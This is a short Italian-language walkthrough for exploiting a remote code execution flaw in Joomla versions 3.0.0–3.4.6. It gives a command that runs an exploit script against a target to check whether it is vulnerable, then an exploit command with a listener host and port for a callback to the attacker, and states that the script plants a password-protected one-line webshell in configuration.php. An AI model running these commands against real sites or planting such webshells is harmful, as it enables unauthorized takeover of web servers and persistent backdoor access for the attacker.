
Versioni interessate: 3.0.0-3.4.6
Versioni interessate: 3.0.0-3.4.6 1、Verifica della vulnerabilità
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
Se viene visualizzato "Vulnerable", la vulnerabilità è presente.
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
Esecuzione riuscita
Inoltre, scrive una webshell a una riga con password casuale nel file "configuration.php".